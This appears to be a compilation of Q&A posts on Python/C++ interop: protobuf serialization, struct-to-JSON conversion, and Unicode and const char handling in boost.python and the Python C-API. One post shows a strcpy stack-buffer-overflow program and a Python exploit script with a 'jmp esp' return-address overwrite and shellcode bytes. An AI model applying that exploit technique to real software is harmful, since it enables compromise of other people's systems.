Converting Python ProtoBuf to C++ ProtoBuf using SerializeToString() and ParseFromString() functions


Hi, I have a simple addressbook.proto example that I am serializing in Python with the protobuf SerializeToString() function. Here's the code.
import address_pb2
person = address_pb2.Person()
person.id = 1234
person.name = "John Doe"
person.email = "jdoe#example.com"
phone = person.phones.add()
phone.number = "555-4321"
phone.type = address_pb2.Person.HOME
print(person.SerializeToString())
Here address_pb2 is the module I generated with the protobuf compiler. Note that the example is copied from the protobuf tutorials. This prints the following byte string.
b'\n\x08John Doe\x10\xd2\t\x1a\x10jdoe#example.com"\x0c\n\x08555-4321\x10\x01'
Now I want to import this string into c++ protobuf. For this I wrote the following code.
#include <iostream>
#include <fstream>
#include <string>
#include "address.pb.h"
using namespace std;
int main(int argc, char* argv[]) {
    GOOGLE_PROTOBUF_VERIFY_VERSION;
    tutorial::AddressBook address_book;
    string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
    if (address_book.ParseFromString(data)) {
        cout << "working" << endl;
    } else {
        cout << "not working" << endl;
    }
    // Optional: Delete all global objects allocated by libprotobuf.
    google::protobuf::ShutdownProtobufLibrary();
    return 0;
}
Here I am simply trying to import the serialized string using the ParseFromString() function, but it doesn't work, and I have been stuck on this for a long time now.
I tried changing the binary string a bit to suit the C++ version, but I still have no idea whether I am on the right path.
How can I achieve this? Does anybody have a clue?

In Python, you are serializing a Person object. In C++, you are trying to parse an AddressBook object. You need to use the same type on both ends.
(Note that protobuf does NOT guarantee that it will detect these errors. Sometimes when you parse a message as the wrong type, the parse will appear to succeed, but the content will be garbage.)
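One way to check which message type a payload holds is to list its top-level fields. Below is a minimal pure-Python sketch of a wire-format reader (the helper names read_varint and top_level_fields are made up for illustration, and only the two wire types that occur in this payload are handled). Assuming the field numbers from the tutorial's addressbook.proto (Person: name = 1, id = 2, email = 3, phones = 4; AddressBook: people = 1), the output matches a Person rather than an AddressBook.

```python
def read_varint(buf, pos):
    """Decode one base-128 varint starting at pos; return (value, next_pos)."""
    result = 0
    shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:          # high bit clear: last byte of the varint
            return result, pos
        shift += 7


def top_level_fields(buf):
    """Return (field_number, wire_type, value) for each top-level field."""
    fields = []
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field_number, wire_type = tag >> 3, tag & 0x07
        if wire_type == 0:           # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:         # length-delimited (string, bytes, nested message)
            length, pos = read_varint(buf, pos)
            value = buf[pos:pos + length]
            pos += length
        else:
            raise ValueError("wire type %d not handled in this sketch" % wire_type)
        fields.append((field_number, wire_type, value))
    return fields


# The byte string printed by the Python code in the question.
payload = b'\n\x08John Doe\x10\xd2\t\x1a\x10jdoe#example.com"\x0c\n\x08555-4321\x10\x01'
fields = top_level_fields(payload)
for field in fields:
    print(field)
```

Field 2 decodes to the varint 1234 and field 4 holds a nested message, which is what Person declares. An AddressBook would contain only field 1, and its content would itself have to be a serialized Person.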
There's another issue with your code that happens not to be a problem in this specific case, but wouldn't work in general:
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
This line won't work if the string has any NUL bytes, i.e. '\x00'. If so, that byte would be interpreted as the end of the string. To avoid this problem you need to specify the length of the data, like:
string data("\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""", 45);
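The same truncation can be reproduced from Python with ctypes, which exposes both the NUL-terminated view and the length-based view of one buffer. This is only an illustration of the effect with a made-up 5-byte value, not protobuf code.

```python
import ctypes

data = b"ab\x00cd"                        # 5 bytes with an embedded NUL
buf = ctypes.create_string_buffer(data)   # copies data and appends a terminator

c_style = buf.value                  # read like a C string: stops at the first NUL
with_length = buf.raw[:len(data)]    # read with an explicit length: keeps every byte

print(c_style)
print(with_length)
```

The first read loses everything after the NUL byte, which is what happens when a std::string is built from a string literal without a length argument.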

Related

Change C++ structure to JSON string using python

Is there any way to convert a C++ structure to a JSON string using Python?
I have multiple C++ files that contain structures such as the following:
#include <iostream>
using namespace std;
struct Person
{
    char name[50];
    int age;
    float salary;
};
I want to convert it to a JSON string so that I can use it in my Python project.
Thanks in Advance.

JSON is a standardized format, and there are libraries for nearly every common programming language that will help you with it.
I am not sure what exactly you are asking: do you really want to convert a C++ file (containing a C/C++ structure) with Python? There are C++ libraries that can do that for you, too.
Read this article about c++ and JSON.

If you want to convert a C++ struct to JSON string, there are a lot of libraries to do that. In my example, I am using https://github.com/nlohmann/json
#include <iostream>
#include <string>
#include "json.hpp"
using namespace std;
using json = nlohmann::json;
struct Person
{
    string name;
    int age;
    float salary;
};
int main()
{
    Person p;
    p.name = "Shivam";
    p.age = 7;
    p.salary = 45.0;
    // Build the JSON object field by field
    json j;
    j["name"] = p.name;
    j["age"] = p.age;
    j["salary"] = p.salary;
    // Compact output
    string s = j.dump();
    cout << s << endl;
    // Pretty print with 4-space indentation
    cout << j.dump(4) << endl;
    return 0;  // 0 signals success to the caller
}
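If the struct data should be handled on the Python side instead, one possible approach is to mirror the layout with ctypes and serialize it with the json module. The sketch below assumes the Person layout from the question. The struct_to_json helper is a hypothetical name, and how the raw struct bytes reach Python (file, socket, shared library) is left open.

```python
import ctypes
import json


class Person(ctypes.Structure):
    # Mirrors the C++ struct from the question: char name[50]; int age; float salary;
    _fields_ = [
        ("name", ctypes.c_char * 50),
        ("age", ctypes.c_int),
        ("salary", ctypes.c_float),
    ]


def struct_to_json(obj):
    """Convert a flat ctypes.Structure into a JSON string."""
    record = {}
    for field_name, _ctype in obj._fields_:
        value = getattr(obj, field_name)
        if isinstance(value, bytes):      # char arrays come back as bytes
            value = value.decode("utf-8")
        record[field_name] = value
    return json.dumps(record)


p = Person(b"Shivam", 7, 45.0)
print(struct_to_json(p))
```

Nested structs or arrays of numbers would need extra handling, since this helper only covers flat structs with scalar and char-array fields.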

Sometimes some of my bytes disappear in my exploit. Why?

I am trying to write my own exploit. The idea is simple: overwrite the return address with the address of a 'jmp esp' opcode. At that point esp holds the address of my shellcode.
So I have this simple program:
#include <stdio.h>
#include <string.h>
void do_something(char *Buffer)
{
    char MyVar[100];
    strcpy(MyVar, Buffer);
}
int main (int argc, char **argv)
{
    do_something(argv[1]);
    return 0;
}
My exploit is written in Python. Here is the code (I think my shellcode does not work, but that is not important right now):
import os
import subprocess
out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68 \x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'
subprocess.call(['SimpleExploit.exe', out])
If I set the address of the 'jmp esp' opcode to 0x41414141 (AAAA),
everything is OK (of course 0x41414141 is not a valid address, but I can see that the memory has been overwritten).
My problem starts when I put in the correct address. I found 0x7769E24D, so I used this value, and after that I saw the following in OllyDbg:
And this is my question: why does the memory look different? It looks as if one line has been removed. But why? Interestingly, if I change only one byte (0x77 to 0x41), the memory is overwritten with the correct value.
The second problem is that some of my bytes are transformed into different values, for example 0x8b into 0x3f.
Could somebody tell me why this happens? Is this some kind of protection? Does it have something to do with my operating system? I use Windows 8.1 x64.

how to extract a unicode string with boost.python

It seems that the code crashes when I do extract<const char*>("a unicode string")
Does anyone know how to solve this?

This compiles and works for me, with your example string and using Python 2.x:
void process_unicode(boost::python::object u) {
    using namespace boost::python;
    const char* value = extract<const char*>(str(u).encode("utf-8"));
    std::cout << "The string value is '" << value << "'" << std::endl;
}
You can write a specific from-python converter if you wish to auto-convert PyUnicode (in Python 2.x) to const wchar_t* or to a type from ICU (which seems to be the common recommendation for dealing with Unicode in C++).
If you want full support for Unicode characters outside the ASCII range (for example, accented characters such as á, ç or ï), you will need to write the from-python converter. Note that this has to be done separately for Python 2.x and 3.x if you wish to support both. For Python 3.x, the PyUnicode type was deprecated and now the string type works as PyUnicode used to for Python 2.x. Nothing that a couple of #if PY_VERSION_HEX >= 0x03000000 cannot handle.
[edit]
The above comment was wrong. Note that, since Python 3.x treats unicode strings as normal strings, boost::python will wrap that into boost::python::str objects. I have not verified how those are handled w.r.t. unicode translation in this case.
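To see what the encode("utf-8") step in the function above hands to C++, here is a small Python 3 sketch (an added illustration, not part of the original C++ code). It shows that the result is a byte string in which each accented character takes more than one byte, which is the form a const char* can carry.

```python
text = "á, ç or ï"
encoded = text.encode("utf-8")   # bytes object, suitable for a const char*

print(len(text), len(encoded))   # character count vs. byte count
print(encoded)

# Decoding with the same codec restores the original text.
round_trip = encoded.decode("utf-8")
```

Any C++ code receiving these bytes has to treat them as UTF-8 rather than as one byte per character.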

Have you tried
extract<std::string>("a unicode string").c_str()
or
extract<wchar_t*>(...)

Python to C/C++ const char question

I am extending Python with some C++ code.
One of the functions I'm using has the following signature:
int PyArg_ParseTupleAndKeywords(PyObject *arg, PyObject *kwdict,
char *format, char **kwlist, ...);
(link: http://docs.python.org/release/1.5.2p2/ext/parseTupleAndKeywords.html)
The parameter of interest is kwlist. In the link above, examples on how to use this function are given. In the examples, kwlist looks like:
static char *kwlist[] = {"voltage", "state", "action", "type", NULL};
When I compile this using g++, I get the warning:
warning: deprecated conversion from string constant to ‘char*’
So, I can change the static char* to a static const char*. Unfortunately, I can't change the Python code. So with this change, I get a different compilation error (can't convert char** to const char**). Based on what I've read here, I can turn on compiler flags to ignore the warning or I can cast each of the constant strings in the definition of kwlist to char *. Currently, I'm doing the latter. What are other solutions?
Sorry if this question has been asked before. I'm new.

Does PyArg_ParseTupleAndKeywords() expect to modify the data you are passing in? Normally, in idiomatic C++, a const <something> * points to an object that the callee will only read from, whereas <something> * points to an object that the callee can write to.
If PyArg_ParseTupleAndKeywords() expects to be able to write to the char * you are passing in, you've got an entirely different problem over and above what you mention in your question.
Assuming that PyArg_ParseTupleAndKeywords does not want to modify its parameters, the idiomatically correct way of dealing with this problem would be to declare kwlist as const char *kwlist[] and use const_cast to remove its const-ness when calling PyArg_ParseTupleAndKeywords() which would make it look like this:
PyArg_ParseTupleAndKeywords(..., ..., ..., const_cast<char **>(kwlist), ...);

There is an accepted answer from seven years ago, but I'd like to add an alternative solution, since this topic seems to be still relevant.
If you don't like the const_cast solution, you can also create a write-able version of the string array.
char s_voltage[] = "voltage";
char s_state[] = "state";
char s_action[] = "action";
char s_type[] = "type";
char *kwlist[] = {s_voltage, s_state, s_action, s_type, NULL};
The char name[] = ".." form copies your string to a writable location.

Python c-api and unicode strings

I need to convert between Python objects and C strings of various encodings. Going from a C string to a unicode object was fairly simple using PyUnicode_Decode; however, I'm not sure how to go the other way.
//char* can be a wchar_t or any other element size, just make sure it is correctly terminated for its encoding
Unicode(const char *str, size_t bytes, const char *encoding="utf-16", const char *errors="strict")
:Object(PyUnicode_Decode(str, bytes, encoding, errors))
{
//check for any python exceptions
ExceptionCheck();
}
I want to create another function that takes the Python Unicode string and puts it in a buffer using a given encoding, e.g.:
//fills buffer with a null terminated string in encoding
void AsCString(char *buffer, size_t bufferBytes,
const char *encoding="utf-16", const char *errors="strict")
{
...
}
I suspect it has something to do with PyUnicode_AsEncodedString; however, that returns a PyObject, so I'm not sure how to put that into my buffer...
Note: both methods above are members of a c++ Unicode class that wraps the python api
I'm using Python 3.0

I suspect it has something to do with PyUnicode_AsEncodedString; however, that returns a PyObject, so I'm not sure how to put that into my buffer...
The PyObject returned is a string object (a PyStringObject in Python 2; in Python 3, which you are using, a bytes object), so you just need to use PyString_Size and PyString_AsString (PyBytes_Size and PyBytes_AsString in Python 3) to get the length and a pointer to the string's buffer, and then memcpy it to your own buffer.
If you're looking for a way to go directly from a PyUnicode object into your own char buffer, I don't think that you can do that.
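The encode-then-copy flow described above can be sketched at the Python level with ctypes. This is an analogue of the C API calls, not the C++ member function itself: as_c_string is a hypothetical helper, the destination is a ctypes char buffer, and UTF-8 is used as the default so that a single NUL byte terminates the string (UTF-16 would need a two-byte terminator).

```python
import ctypes


def as_c_string(text, buffer, encoding="utf-8", errors="strict"):
    """Encode text and copy it, NUL-terminated, into a ctypes char buffer.

    Returns the number of bytes written, excluding the terminator.
    """
    encoded = text.encode(encoding, errors)         # role of PyUnicode_AsEncodedString
    if len(encoded) + 1 > len(buffer):
        raise ValueError("buffer too small for encoded string")
    ctypes.memmove(buffer, encoded, len(encoded))   # role of memcpy
    buffer[len(encoded)] = b"\x00"                  # single-byte terminator
    return len(encoded)


buf = ctypes.create_string_buffer(16)
written = as_c_string("héllo", buf)
print(written, buf.value)
```

The size check before the copy is the part that is easy to forget in the C++ version, where the encoded length is only known after the encoding step has run.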
